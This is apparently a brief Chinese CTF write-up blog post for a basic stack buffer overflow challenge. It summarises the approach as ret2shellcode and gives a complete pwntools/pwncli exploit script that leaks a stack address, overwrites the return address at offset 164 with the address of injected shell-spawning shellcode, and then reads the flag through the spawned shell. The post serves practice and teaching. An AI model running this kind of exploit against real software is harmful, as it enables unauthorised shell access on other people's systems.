root_me_stack_buffer_overflow_basic

2022-03-05 约 200 字预计阅读 1 分钟 - 次阅读

总结

基础的ret2shellcode的题目，直接用pwntools生成shellcode即可。

EXP

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30


#!/usr/bin/python3
# -*- encoding: utf-8 -*-
# author: roderick
from pwncli import *

context.binary = "./root_me_stack_buffer_overflow_basic"
context.log_level = "debug"

io = remote("node4.buuoj.cn", 29064)

sh = shellcraft.sh()

data = "aaaa"
io.sendlineafter("Give me data to dump:\n", data)
m = io.recvline()
log_ex(f"Get msg: {m}")
stack_addr = int16_ex(m[:10])
log_address("stack_addr", stack_addr)
io.sendlineafter("Dump again (y/n):\n", "y")

data = flat({
    0:asm(sh),
    164: stack_addr
})
io.sendlineafter("Give me data to dump:\n", data)
io.sendlineafter("Dump again (y/n):\n", "n")

io.sendline("cat flag")

io.interactive()

引用与参考

1、My Blog

2、Ctf Wiki

3、pwncli

Buy me a coffee~

赞赏

支付宝

微信